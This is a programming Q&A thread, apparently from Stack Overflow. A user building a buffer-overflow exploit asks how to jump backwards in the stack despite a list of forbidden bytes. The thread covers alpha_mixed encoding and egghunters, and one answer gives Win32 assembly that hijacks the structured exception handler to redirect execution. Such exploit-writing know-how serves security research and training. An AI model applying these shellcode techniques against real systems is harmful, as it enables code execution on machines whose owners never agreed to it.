# reverse move in stack without jmp

Tags: assembly, stack, buffer-overflow, exploit, shellcode

**Update**:  Since I'm able to get the correct address into a register that I want to jump/call to, I think the best option would be to figure out a way to have self modifying code result in a jmp/call register.  Ex. FFD6 call esi  Would anyone be able to give me some pointers or an example in assembly of how to get a resulting FFD6?

I'm messing around with an exploit, and having a hard time moving backwards in the stack due to bad characters.  I need to move back ~460 bytes to get to the start of my buffer.

Here is a list of the bad characters:

\x0a\x0d\x1a\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

I'm limited to x86\alpha_mixed with a couple exceptions like x81 & x8d.  The only way I've been able to move back in the stack is \x74\x81 (which are allowed characters), but I'd have to do that 4 times to get back the ~460.  That wouldn't be the biggest deal, except that will also make it very difficult for me to segment my shellcode when I'm already having to encode it to alpha_mixed.

I'm not an assembly master, so is there any other way that I'm missing that I might be able to move directly back without jmp or call (FF)?

Comment: Self modifying code allowed?

Comment: Yes, as long as it doesn't have any bad characters.  I was working on a list of bad characters when I think I found my solution:  omlette egghunter.  That should allow me to jump and combine the pieces of my shellcode

Comment: By the way, why is `\x81` allowed? What are the list of bad characters then? :)

Comment: @Jester Yeah, I know.  I've just been trying to use alpha_mixed to be safe.  There are some random, normally bad characters that do seem to be working. \x81 & \x8d work.  \x00 still allows for characters afterwords as well.  I've edited my original post with a list of bad characters.

Comment: @Jester I tried to encode E92FFEFFFF        jmp dword 0xfffffe34 with msfvenom into x86/alpha_mixed but it gave me a 695 byte shellcode that is obviously way too long.  Other than doing it manually, is there a more efficient way? I'm able to get a correct memory address of where I want to jump into a register using good characters, but having problems finding opcodes that aren't bad characters to use the register with.

Answer (score 2):

I have a working solution, but it's **for Windows only** and is based on a few other assumptions.

It's not totally optimized, I guess there are better ways to do parts of this...

```
; ASSUMPTIONS:
;   Platform is Win32
;   ESI contains address to be jumped to
;   All characters except for 00 and the ones you listed above are allowed
;   The contents of the registers after the jump don't matter
; BASIC METHOD:
;   1) Set up a structured exception handler pointing to your target address
;   2) Cause an exception

; Get zero into EAX and EDX
00401000      B8 11111111   MOV EAX, 11111111
00401005      35 11111111   XOR EAX, 11111111
0040100A      50            PUSH EAX
0040100B      5A            POP EDX

; First part of the SEH: Push target address
0040100C      56            PUSH ESI

; Second part of the SEH: Read FS:[0] and push it
0040100D      64:0310       ADD EDX, FS:[EAX]
00401010      52            PUSH EDX

; Get zero into EDX again
00401011      50            PUSH EAX
00401012      5A            POP EDX

; Write new SEH pointer into FS:[0]
00401013      64:2110       AND FS:[EAX], EDX
00401016      64:0120       ADD FS:[EAX], ESP

; Trigger exception (writing to memory at address zero)
00401019      0110          ADD [EAX], EDX
```

Comment: That's actually a really good idea. Thanks for this. On a side note, is there an easy way to get the current location in memory into a register on win32 not using the above characters since the SEH exception clears the registers?

Comment: I think I might of answered my own question, but I'd like to also know if there is another way.  Since 0x8d is available, I should be able to lea reg, [ESP+whatever] the address.

Comment: Just fixed a little copy error, the fourth instruction is pop and not push of course.

Comment: About the current location - I'm not sure I thought about this as well and I'd normally call the next instruction which is basically a "push eip", but this doesn't work with your restriction. However, you should get a pointer on the stack somewhere after the exception happened which points back to the esp value we pushed before that, and you should also have a pointer to the exception record and context where you should see the address where the exception happened.

Comment: Have to admit, I blindly typed in what you had above, I didn't catch the pop for a while.  I also was able to encode a reverse jump with msfvenom, which takes up 64 bytes but I also have to tell it which register holds the start address of the code, otherwise it uses characters I don't have available.  My exploit currently works 1 out of 3 times, I just need to find the most reliable way of finding current address in memory after SEH since that's also what my exploit is.